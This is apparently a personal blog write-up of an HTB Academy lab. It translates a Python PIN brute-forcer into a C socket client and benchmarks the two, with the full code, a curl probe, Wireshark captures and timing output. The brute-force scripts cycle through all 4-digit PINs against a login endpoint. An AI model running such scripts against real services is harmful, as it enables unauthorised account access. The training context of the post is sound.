Login Bruteforcing: Sockets and Pins

Today we'll go through the Login Bruteforce Module and I'll be translating some Python to C. Since I am interested in malware development, I thought it would be a cool exercise to translate the code they provide to C.

This translation will be done for two motives:

Dust off my C knowledge
See if C is faster than Python when it comes to HTTP requests

Translating Pin-solver.py

The following code is given to us by HTB Academy:

import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
    print(f"Attempted PIN: {formatted_pin}")

    # Send the request to the server
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")

    # Check if the server responds with success and the flag is found
    if response.ok and 'flag' in response.json():  # .ok means status code is 200 (success)
        print(f"Correct PIN found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break

Let's break down some functionalities we need to do:

connect to the host or send a get request
receive the response and look for the flag

I'll use curl to see what the JSON looks like and give me an idea of what I'll be looking for:

curl -s http://94.237.63.1:37387/pin?pin=1111

{"message":"Incorrect PIN!"}

Making a socket in c

I have made sockets before in Python for CTFs, but never in C. I am using Beej's Guide and the book Hacking, The Art of Exploitation. The connection to the socket will look like:

int connect_my_socket(char* host, int port){
    int sockfd; 
    struct sockaddr_in host_addr;

    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        printf("[-] in socket");
    }

    host_addr.sin_family = AF_INET;
    host_addr.sin_port = htons(port);
    host_addr.sin_addr.s_addr = inet_addr(host);

    memset(host_addr.sin_zero, '\0', sizeof(host_addr.sin_zero));

    bind(sockfd, (struct sockaddr *)&host_addr, sizeof host_addr);

    if (connect(sockfd, (struct sockaddr *)&host_addr, sizeof(host_addr)) < 0) {
        printf("[-] Error connecting");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

    return sockfd;
}

Now, to explain the shenanigans I'm doing.

int_connect_my_socket() receives a string and an integer, an IP, and a port.
sockfd is a socket file descriptor. A file descriptor is like a hospital wristband that holds your information. You know how you go to the hospital and they put a wristband on you with your name and a funny number on it? Then they use this wristband to apply any treatment you need. They're like: "perform_test(#231456, X-Rays)". This is what file descriptors do. They identify a file or a socket in this case. This is because, in UNIX systems, input and output is done through files. So this line declares the variable where we'll store our file descriptor.
struct sockaddr_in host_addr this structure handles internet access
(sockfd = socket(AF_INET, SOCK_STREAM, 0)) we're declaring the socket to use IPv4 Internet Protocols (AF_INET), be a steam socket (a.k.a provide two-way communication, like a phone call) and the protocol to use with the socket. There are several protocols but we usually put 0 because there is usually just a single protocol.
host_addr.* is defining the address family, port, and host. htons changes the byte ordering and inet_addr turns the host from IPv4 to a value that'll be used as an Internet Address.
memset is setting everything in sin_zero to \0 values to ensure there is no garbage or random stuff in the padding.
bind() assigns the address and the host to the file descriptor
Finally, we test the connection. If it's successful, we return the file descriptor.

If we were doing this in Python, it would look in fact, very similar (much more readable):

def connect(host, port):
    #socket object
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.connect((host, port))
    return server

And now, we can use the code. My code looks something like this:

int main(int argc, char *argv[]){
    if(argc != 3){
        printf("[-] Usage is: <IP> <port>");
    }

    ServerInfo info = set_info(argv[1], atoi(argv[2]));

    printf("Server info received: %s:%d\n", info.ip, info.port);

    for(int i = 0; i < 9999; i++){
        int server = connect_my_socket(info.ip, info.port);
        char command[256];
        char rec[8096];
        int len, bytes_sent, bytes_received, bytes_total_cout = 0;
        printf("Attempting pin: %04d\n", i);
        len = sprintf(command, "GET pin?pin=%04d HTTP/1.1\r\nHost: %s:%d\r\nConnection: keep-alive\r\n\r\n", i, info.ip, info.port);
        bytes_sent = send(server, command, len, 0);

        while(bytes_received = recv(server, rec + bytes_total_cout, sizeof(rec) - bytes_total_cout, 0)){
            bytes_total_cout += bytes_received;
        }

        if (bytes_total_cout > 0) {
            rec[bytes_total_cout] = '\0';  
            if(strstr(rec, "HTB") != NULL){
                printf("%s\n", rec);
                printf("Flag found");
                close(server);
                
                return 1;  
            }
        }
        close(server);
    }
    
}

And we get on with the hacking

Troubleshooting Interlude

If you observe the code, you'll see I'm starting a connection at the beginning of each iteration and closing it at the end. Do you wonder what I did and spam GET requests in a single connection? If you do, you're welcome to stay and read this bit, else, I'll continue with the benchmarking in the next header.

I tried connecting before the loops. I'll attach the Python code I used to troubleshoot this:

server = connect(HOST, PORT)
for i in range(0, 4):
    request = f"GET pin?pin={i:04} HTTP/1.1\r\nHost: {HOST}:{PORT}\r\nConnection: keep-alive\r\n\r\n"
    print(f"sending pin: {i:04}")
    try:
        server.sendall(request.encode())
    except:
        server = connect(HOST, PORT)
        server.sendall(request.encode())

    response = b""
    while True:
        chunk = server.recv(4096)
        if not chunk:
            break
        response += chunk

    r = response.decode()
    print(r)

server.close()

I used python because I was having trouble running Wireshark and WSL at the same time. If Wireshark was capturing, WSL would lose it's internet conection and therefore no requests would go out. This was fixed by running WSL in admin mode.

I wondered why I could not do this. It was a very nice and very demure way of doing this, spamming GET requests would have been so fast. But because I would only get one JSON back, I opened Wireshark and saw the following:

GET pin?pin=0000 HTTP/1.1
Host: 94.237.54.253:55902
Connection: keep-alive

HTTP/1.1 401 UNAUTHORIZED
Server: Werkzeug/3.0.4 Python/3.11.10
Date: Sun, 20 Oct 2024 02:42:59 GMT
Content-Type: application/json
Content-Length: 29
Connection: close

{"message":"Incorrect PIN!"}
GET pin?pin=0001 HTTP/1.1
Host: 94.237.54.253:55902
Connection: keep-alive

GET pin?pin=0002 HTTP/1.1
Host: 94.237.54.253:55902
Connection: keep-alive

GET pin?pin=0003 HTTP/1.1
Host: 94.237.54.253:55902
Connection: keep-alive

The key lies in the server's response. Every time I get the response, the connection is set to close. It's like knocking on someone's door and the owner opening the door only to tell you not to come back and close it back to your face. If you keep knocking, you won't get any response. In fact, Wireshark shows packets with the RSTflag, telling us that the port is closed.

Which makes the next section a bit predictable.

Benchmarking: Python vs. C

Finally, we run both codes. This is how a sample output would look like:

For C:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.4 Python/3.11.10
Date: Mon, 21 Oct 2024 16:15:51 GMT
Content-Type: application/json
Content-Length: 65
Connection: close

{"flag":"_____________________","message":"Correct PIN!"}

Flag foundExecution time: 2027.723991311 seconds\n

Attempting pin: 8868
HTTP/1.1 200 OK
Server: Werkzeug/3.0.4 Python/3.11.10
Date: Mon, 21 Oct 2024 15:39:07 GMT
Content-Type: application/json
Content-Length: 65
Connection: close

{"flag":"________________","message":"Correct PIN!"}

Flag found
Execution time: 2052.015627226 seconds

For Python:

Correct PIN found: 8868
Flag: ______________________
time taken:  2062.7126121520996

Correct PIN found: 8868
Flag: HTB{____________________________}
time taken:  2046.4633114337921

After running the codes several times, the differences were always by seconds. Sometimes Python would be faster than C by 5 to 30 seconds, and sometimes it would be the other way around. In the end of the day, there is no difference because the overhead is in the connection to the server and that is the same both in Python and C.

Thank you for reading! This is it for today, next post will go through dictionary attacks in both bash and PowerShell. If you have any comments or would like to connect, I am always eager to chat on my linkedin

PreviousLogin Bruteforcing NextLogin Bruteforcing: Dictionary Attacks with Scripting Languages

Last updated 1 year ago